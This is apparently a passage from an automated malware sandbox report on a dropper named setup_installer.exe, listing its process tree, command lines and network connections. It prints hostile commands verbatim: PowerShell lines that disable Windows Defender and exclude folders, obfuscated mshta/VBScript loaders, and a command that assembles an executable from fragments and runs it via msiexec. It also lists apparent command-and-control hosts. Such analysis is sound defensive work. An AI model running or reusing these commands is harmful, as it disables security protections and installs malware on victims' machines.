PID 3124 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe
PID 4708 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2188 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 208 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 528 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2380 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2188 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5080 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5080 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 5080 wrote to memory of 4132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4708 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 60 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4708 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe
PID 2380 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe
PID 2380 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe
PID 528 wrote to memory of 4048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe
PID 528 wrote to memory of 4048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe
PID 528 wrote to memory of 4048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe
PID 4112 wrote to memory of 2564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu126011caea28.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Thu125e541847539.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12465fe68f85b6156.exe

Thu12465fe68f85b6156.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe

Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1231d30cda84872.exe

Thu1231d30cda84872.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu122f7469b214cb59.exe

Thu122f7469b214cb59.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu1262fd911d3e6320.exe

Thu1262fd911d3e6320.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe

Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12b275ee70c7e913.exe

Thu12b275ee70c7e913.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu120bfbc2443b3b5d.exe

Thu120bfbc2443b3b5d.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe

Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu124078ed79bdbd5.exe

Thu124078ed79bdbd5.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe

Thu125e541847539.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4708 -ip 4708

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu123e05ebe43921.exe

Thu123e05ebe43921.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe

Thu12493eba7a.exe

C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp

"C:\Users\Admin\AppData\Local\Temp\is-LLN4U.tmp\Thu125e541847539.tmp" /SL5="$40240,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe"

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12ca1c119bc29.exe

Thu12ca1c119bc29.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu128b511c77e8c.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 616

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu126011caea28.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12912263469836d.exe

C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe

"C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )

C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5BQ15.tmp\Thu125e541847539.tmp" /SL5="$B01D0,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu125e541847539.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2564 -ip 2564

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS43C94A97\Thu12493eba7a.exe" ) do taskkill -f -Im "%~nXQ"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 360

C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe

yDhNY.exe /pFKkSWJQc5v2ppVFMo

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -Im "Thu12493eba7a.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ( "cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" ) do taskkill -f -Im "%~nXQ"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe (CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 " , 0 ,trUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe -Y .\ISA502G.S7

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffd30c8cc40,0x7ffd30c8cc4c,0x7ffd30c8cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2000,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1992 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2340 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3124 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3256 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4588,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4528 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3748,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4728 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5004,i,5828647444638608440,5241468669238145442,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5016 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 www.listincode.com udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 208.95.112.1:80 ip-api.com tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 t.gogamec.com udp
N/A 127.0.0.1:56142 tcp
N/A 127.0.0.1:56144 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 gcl-gb.biz udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
NL 45.9.20.13:80 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
NL 45.9.20.13:80 tcp
